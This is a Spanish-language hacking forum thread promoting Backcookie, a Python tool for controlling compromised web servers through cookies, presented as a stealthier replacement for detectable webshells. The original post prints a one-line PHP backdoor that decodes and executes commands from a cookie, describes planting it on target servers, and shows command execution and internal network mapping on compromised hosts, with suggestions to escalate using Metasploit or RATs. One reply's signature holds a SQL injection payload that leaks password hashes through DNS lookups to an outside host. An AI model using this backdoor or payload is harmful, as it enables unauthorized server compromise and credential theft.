Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Backcookie la herramienta de conexión remota

  • 5 Respuestas
  • 9844 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BrowserNet

  • *
  • Underc0der
  • Mensajes: 88
  • Actividad:
    0%
  • Reputación 2
  • El TioCyberPunks esta en el barco
    • Ver Perfil
  • Skype: browsernet
« en: Mayo 28, 2016, 02:22:24 pm »


Saludos nuevamente hermanos de underc0de en esta oportunidad vamos a modernizarnos para dejar atrás las webshells, que en su mayoría ya están quemadas por algunos antivirus y firewalls que puede tener un servidor web,dando  entrada a Backcookie  una herramienta escrita en python la cual tiene como función tener conexiones entrantes de servidores web mediante cookies, vayamos a la acción

Backdoors detectable.



¿Que es una Cookie?
 
Las cookies son un mecanismo por el que se almacenan datos en el navegador remoto para monitorizar o identificar a los usuarios que vuelvan al sito web.

referencia: http://php.net/manual/es/features.cookies.php

Lo que haremos sera descargar la herramienta Backcokkie, luego de ello pasaremos a extraerlo

Código: [Seleccionar]
[email protected]:~# wget https://github.com/jofpin/backcookie/archive/master.zip
Antes de comenzar deseo mandar un saludo  para un buen hermano mio, "Fraph Core" que el día de hoy esta cumpliendo un año mas de vida, por este motivo realizo este post, ya que la herramienta es creada por el y es la forma mas oportuna de hacerlo.
Feliz cumpleaños hermano!!

Iniciando la herramienta




Antes que nada podemos observar como funciona la herramienta, de acuerdo al autor funciona de dos maneras :

Código: [Seleccionar]
    Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
    Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie
Métodos de subir el código de conexión 

Source:


<?php error_reporting(0); system(base64_decode($_COOKIE["yourcookie"])); ?>


El primer método en un servidor VPS

sera crear un archivo .php añadiendo el codigo y subirlo al servidor web.



El segundo método

seria añadir el código en archivo del servidor web, mediante una webshell.



Estos métodos serian los que podan utilizar ustedes,mas abajo les tengo una sorpresa cual método yo  me ingenie para hacerlo aun mas confidencial.

entonces una ves añadido nuestro código, pasaremos ejecutarlo:





Como podemos observar el dominio comprometido es un servidor privado (VPS), la cual tenemos acceso al sistema del servidor, la cual podemos subir nuestros payload de meterpreter,archivos RAT,o los que ustedes deseen, en mi caso les enseñare a utilizar esta herramienta de manera estándar, en este servidor VPS en Windows como prueba de concepto.

Lo que haremos sera ejecutar el comando CMD



como vemos hemos tenido acceso a la interprete de comandos de windows, lo que podemos hacer ahora es ejecutar los comandos que utilizamos siempre, en mi caso haré un mapeo de todas las IP'S conectadas al servidor, en este caso todos los demás servicios privados.



como podemos observar nos arroja las IP'S conectadas la cual podemos aprovecharlas para auditarlas y explotarlas mediante metasploit, o subir un archivo RAT y capturar todos los datos del servidor, por mi parte no lo haré, por motivos de ética, de igual manera podemos ver el tipo de servicio del router como veremos aquí:



Paremos a entrar a otro servidor web, en este caso el siguiente:



Como vemos es un servidor en Linux la cual, podemos interactuar con ella, sin mas que decir doy como culminado este POST, espero les aya gustado demasiado la herramienta Backcookie, ya que llevo casi un año utilizando esta gran herramienta y lo hago publico porque eh visto que hay "Personas" que han modificado el nombre del autor y han estado ripiandola :/

Desconectado T3mpor4lGN

  • *
  • Underc0der
  • Mensajes: 11
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Mayo 29, 2016, 12:05:04 pm »
Excelente compañero muchas gracias por compartir!.

Enviado desde mi Black Phone!


Desconectado noc

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Agosto 22, 2016, 05:13:39 pm »
buen tutorial, haré un POC en mi máquina, se ve genial la herramienta.

Gracias por compartir

Desconectado 'or '1'=1

  • *
  • Underc0der
  • Mensajes: 15
  • Actividad:
    0%
  • Reputación 2
  • 1;if+not(select+s_user)+<>'sa'+waitfor+delay+'1'--
    • Ver Perfil
    • Email
  • Skype: :)
« Respuesta #3 en: Enero 30, 2017, 11:49:35 am »
good job!, ready to test my shells, b374k is a good shell btw
1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.undisclosure.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--

Desconectado Mr.Sab0taj3

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Agosto 12, 2017, 09:19:18 am »
Gran tool hermano, arriba ese autor!

Desconectado kr0pl0its

  • *
  • Underc0der
  • Mensajes: 4
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #5 en: Octubre 29, 2017, 03:18:23 am »
Muy Buena Herramienta   ;D

 

¿Te gustó el post? COMPARTILO!



SQLMap – Herramienta Automática De Inyección SQL

Iniciado por DeuSer

Respuestas: 0
Vistas: 2718
Último mensaje Marzo 25, 2010, 07:55:21 pm
por DeuSer
WebRaider - Herramienta Automatica

Iniciado por SkillmaX

Respuestas: 2
Vistas: 2854
Último mensaje Julio 01, 2010, 10:33:50 am
por Cronos
Exploit para Apache Struts (ejecución remota de comandos) [Tomcat]|CVE2017-5638

Iniciado por Eschiclers

Respuestas: 9
Vistas: 7633
Último mensaje Marzo 23, 2017, 03:57:38 pm
por zoro248